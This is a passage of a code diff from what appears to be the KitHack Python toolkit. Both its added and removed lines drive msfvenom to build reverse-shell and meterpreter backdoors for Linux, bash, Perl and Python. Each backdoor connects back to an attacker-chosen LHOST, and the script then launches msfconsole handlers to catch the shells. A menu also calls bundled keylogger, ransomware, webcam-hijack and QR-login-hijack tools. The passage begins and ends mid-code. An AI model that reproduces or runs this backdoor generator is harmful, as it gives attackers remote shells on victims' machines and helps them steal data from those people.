".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_udp; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD python/shell_reverse_udp; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif sys == '07': + print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} cmd/unix/reverse_bash'.format(WHITE, YELLOW)) + print( + '{0}[02]{1} cmd/unix/reverse_bash_telnet_ssl'.format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == '01': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash LHOST={0} LPORT={1} -f raw > output/{2}.sh'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.sh'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '02': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash_telnet_ssl LHOST={0} LPORT={1} -f raw > output/{2}.sh'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.sh'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif sys == '08': + print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} cmd/unix/reverse_perl'.format(WHITE, YELLOW)) + print('{0}[02]{1} cmd/unix/reverse_perl_ssl'.format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == '01': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl LHOST={0} LPORT={1} -f raw > output/{2}.pl'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.pl'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif pay == '02': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl_ssl LHOST={0} LPORT={1} -f raw > output/{2}.pl'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.pl'.format(mainout)).st_size != 0: + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"'.format(LHOST, LPORT)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"') + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif sys == 9: + LHOST = raw_input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = raw_input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + PAYLOAD = raw_input( + "\n{0}SET PAYLOAD: {1}".format(YELLOW, DEFAULT)) + if ".tcp.ngrok.io" in LHOST: + LHOST = "127.0.0.1" + LPORT = "443" + # continue + os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {}; set LPORT {}; set PAYLOAD {}; exploit\'"'.format(LHOST, LPORT, PAYLOAD)) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif option == '11': + webbrowser.open("https://adrmxr.github.io/KitHack", + new=1, autoraise=True) + os.system('clear') + main() + + elif option == '12': + pause("\n{}Press any key to exit...".format(GREEN)) + time.sleep(1) + os.system('clear') + print(exit_main) + exit(0) + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + os.system('clear') + main() - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.TheFatRat() - - elif tool == '02': - kitools.Msfpc() - - elif tool == '03': - kitools.Fcrackzip() - - elif tool == '04': - kitools.QRLjacker() - - elif tool == '05': - kitools.Lazy() - - elif tool == '06': - kitools.HTBINVITE() - - elif tool == '07': - kitools.Ngrok() - - elif tool == '08': - kitools.Bluepot() - - elif tool == '09': - kitools.Setoolkit() - - elif tool == '10': - kitools.A2sv() - - elif tool == '11': - kitools.Fornonimizer() - - elif tool == '12': - kitools.Easysploit() - - elif tool == '13': - kitools.NXcrypt() - - elif tool == '14': - kitools.KnockMail() - - elif tool == '15': - kitools.RkHunter() - - elif tool == '16': - kitools.HeraKeylogger() - - elif tool == '17': - kitools.ZLogger() - - elif tool == '18': - kitools.Xerosploit() - - elif tool == '19': - kitools.Slacksec() - - elif tool == '20': - kitools.Katana() - - elif tool == '21': - kitools.Z0172CKTools() - - elif tool == '22': - kitools.CamHack() - - elif tool == '23': - kitools.Onex() - - elif tool == '24': - kitools.Ransom0() - - elif tool == '25': - kitools.Morpheus() - - elif tool == '26': - kitools.FBTOOL() - - elif tool == '27': - kitools.Venom() - - else: - print("\n{}[X] INVALID OPTION".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '10': - # sys msfvenom - os.system('clear') - print(msf_banner) - print ('\n{0} [*] {1}Sys Payloads:\n'.format(DEFAULT, GREEN)) - print ('{0}[01] {1}LINUX {0}--> {2}Kithack.elf'.format(WHITE, YELLOW, RED)) - print ('{0}[02] {1}WINDOWS {0}--> {2}Kithack.exe'.format(WHITE, YELLOW, RED)) - print ('{0}[03] {1}ANDROID {0}--> {2}Kithack.apk'.format(WHITE, YELLOW, RED)) - print ('{0}[04] {1}MAC OS {0}--> {2}Kithack.macho'.format(WHITE, YELLOW, RED)) - print ('{0}[05] {1}PHP {0}--> {2}Kithack.php'.format(WHITE, YELLOW, RED)) - print ('{0}[06] {1}PYTHON {0}--> {2}Kithack.py'.format(WHITE, YELLOW, RED)) - print ('{0}[07] {1}BASH {0}--> {2}Kithack.sh'.format(WHITE, YELLOW, RED)) - print ('{0}[08] {1}PERL {0}--> {2}Kithack.pl'.format(WHITE, YELLOW, RED)) - print ('{0}[09] {1}RUN MSFCONSOLE {0}'.format(WHITE, YELLOW)) - print ('{0} [0] {1}Back'.format(WHITE, YELLOW)) - - sys = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - sys = sys.zfill(2) - - if sys == '00': - os.system('clear') - main() - - elif sys == '01': - print ('{0}\n[*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} linux/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[02]{1} linux/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[03]{1} linux/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[04]{1} linux/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[05]{1} linux/x64/shell_bind_tcp'.format(WHITE, YELLOW)) - print ('{0}[06]{1} linux/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[07]{1} linux/x86/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[08]{1} linux/x86/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[09]{1} linux/x86/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[10]{1} linux/x86/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[11]{1} linux/x86/shell_bind_tcp'.format(WHITE, YELLOW)) - print ('{0}[12]{1} linux/x86/shell_reverse_tcp'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] AN ERROR HAS OCCURED WHILST GENERATING THE PAYLOAD\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '03': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '04': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '05': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/shell_bind_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_bind_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '06': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/shell_reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '07': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '08': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x86/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter_reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '09': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, 